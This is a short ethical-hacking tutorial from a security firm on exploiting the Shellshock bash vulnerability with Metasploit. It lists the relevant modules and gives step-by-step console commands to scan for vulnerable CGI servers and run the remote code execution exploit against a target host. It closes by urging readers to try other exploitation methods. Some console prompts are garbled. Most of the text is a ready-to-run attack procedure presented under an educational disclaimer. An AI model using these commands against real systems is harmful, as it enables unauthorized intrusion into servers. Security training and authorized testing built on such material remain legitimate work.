TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.

 

 

Shellshock was another one of those exploits that was very impactful across the IT industry. Some said it was Heartbleed 2.0.

 

There are already many Metasploit modules evailable for Shellshock including:

 

> auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
> auxiliary/server/dhclient_bash_env.rb
> exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
> exploits/osx/local/vmware_bash_function_root.rb

 

 

Let's try one...Start by launching Metasploit. Remember to start the database service!

 

# service postgresql start

/opt/metasploit/app# ./msfconsole

 

Once launched, use the following commands to scan for vulnerable systems:

 

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env

msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set RHOSTS <TARGETS>

RHOSTS=> <TARGETS>

msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/printenv.cgi
TARGETURI=> /cgi-bin/printenv.cgi

msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > run

 

Once a vulnerable system is discovered, it can be exploited using the following module:

 

msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec

msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.1
RHOST=> 192.168.1.1

msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/printenv.cgi
TARGETURI=> /cgi-bin/printenv.cgi

msf exploit(apache_mod_cgi_bash_env_exec) > run

 

There are many ways to expoit this vulnerability. Try out a few different ways and see for your self why it is so dangerous.